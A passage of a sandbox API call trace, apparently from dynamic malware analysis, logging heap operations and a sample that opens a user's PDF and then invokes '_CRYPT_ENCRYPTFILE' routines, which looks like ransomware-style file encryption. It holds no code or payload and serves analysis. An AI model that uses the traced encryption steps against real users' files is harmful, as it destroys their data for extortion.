Size=0x10) returned 0x43cac88 [0079.048] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0079.048] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0079.048] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0079.048] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0079.048] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0079.049] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0079.049] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0079.049] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0079.049] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0079.049] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0079.049] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0079.049] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caad8 [0079.049] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0079.049] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0079.049] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0079.049] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0079.049] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0079.049] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0079.049] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0079.049] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0079.049] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caad8 [0079.049] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0079.049] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0079.049] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0079.049] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0079.049] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0079.049] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0079.049] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0079.050] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0079.050] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0079.050] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0079.050] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0079.050] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0079.050] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0079.050] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0079.050] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0079.050] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0079.050] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.050] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cabf8 [0079.050] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43cabf8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0079.050] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0079.050] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0079.050] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0079.051] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0079.051] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0079.051] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0079.051] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0079.051] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0079.051] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0079.051] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0079.051] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0079.051] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0079.051] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20002) returned 0x43eb3a8 [0079.051] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0079.051] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0079.051] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0079.051] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0079.051] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0079.051] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0079.051] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0079.051] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0079.051] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\eY_Dc1TDsg.pdf" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\ey_dc1tdsg.pdf"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x298 [0079.051] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0079.051] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e95f0 [0079.052] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0079.052] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0079.052] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab08 [0079.052] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0079.052] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0079.052] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0079.052] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0079.052] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0079.052] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0079.052] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0079.052] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0079.052] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0079.052] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0079.052] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x43595f0 [0079.052] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eb3a8 | out: hHeap=0x1780000) returned 1 [0079.052] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad30 [0079.052] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0079.052] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0079.052] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0079.052] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0079.052] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0079.052] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0079.052] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0079.052] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa90 [0079.053] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0079.053] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0079.053] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0079.053] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0079.053] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0079.053] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0079.053] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0079.053] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0079.053] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0079.053] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0079.053] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0079.053] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0079.053] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0079.053] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0079.053] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0079.053] FreeLibrary (hLibModule=0x772d0000) returned 1 [0079.053] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0079.053] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0079.053] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0079.053] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0079.053] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0079.053] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0079.053] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0079.053] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0079.053] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0079.054] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0079.054] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0079.054] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0079.054] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0079.054] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0079.054] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0079.054] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0079.054] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0079.054] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0079.054] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0079.054] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0079.054] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0079.054] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0079.054] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0079.054] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0079.054] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0079.054] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0079.054] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0079.054] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0079.054] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0079.054] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0079.054] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0079.054] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0079.054] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0079.054] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0079.055] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0079.055] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0079.055] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0079.055] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0079.055] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5250 | out: hHeap=0x1780000) returned 1 [0079.055] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0079.055] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0079.055] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea508 | out: hHeap=0x1780000) returned 1 [0079.055] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0079.055] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0079.055] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0079.055] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0079.055] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0079.055] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0079.055] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0079.055] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0079.055] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d68 | out: hHeap=0x1780000) returned 1 [0079.055] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0079.055] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0079.055] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0079.055] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0079.055] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0079.055] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8c78 | out: hHeap=0x1780000) returned 1 [0079.055] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0079.055] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0079.055] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0079.056] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0079.056] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0079.056] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0079.056] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0079.056] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0079.056] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0079.056] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0079.056] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0079.056] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0079.056] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0079.056] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0079.056] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0079.056] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0079.056] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0079.056] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0079.056] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391dc8 | out: hHeap=0x1780000) returned 1 [0079.056] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0079.056] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0079.056] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0079.056] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0079.056] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0079.056] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0079.056] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0079.056] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0079.056] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0079.056] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0079.057] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0079.057] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43595f0 | out: hHeap=0x1780000) returned 1 [0079.057] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0079.057] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0079.057] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0079.057] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0079.057] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0079.057] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0079.057] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0079.057] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0079.057] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0079.057] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0079.057] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e95f0 | out: hHeap=0x1780000) returned 1 [0079.057] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0079.057] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0079.057] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0079.057] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0079.057] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0079.057] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0079.057] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0079.057] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2440 | out: hHeap=0x1780000) returned 1 [0079.057] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0079.058] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.058] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43ca658, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0079.058] CloseHandle (hObject=0x298) returned 1 [0079.058] FreeLibrary (hLibModule=0x772d0000) returned 1 [0079.058] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0079.058] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\eY_Dc1TDsg.pdf", lpFindFileData=0x144ead0 | out: lpFindFileData=0x144ead0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9ecd1c80, ftCreationTime.dwHighDateTime=0x1d5e495, ftLastAccessTime.dwLowDateTime=0xb9a0f690, ftLastAccessTime.dwHighDateTime=0x1d5e453, ftLastWriteTime.dwLowDateTime=0xb9a0f690, ftLastWriteTime.dwHighDateTime=0x1d5e453, nFileSizeHigh=0x0, nFileSizeLow=0xba63, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="eY_Dc1TDsg.pdf", cAlternateFileName="EY_DC1~1.PDF")) returned 0x41ac040 [0079.058] FindClose (in: hFindFile=0x41ac040 | out: hFindFile=0x41ac040) returned 1 [0079.059] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0079.059] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0079.059] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: 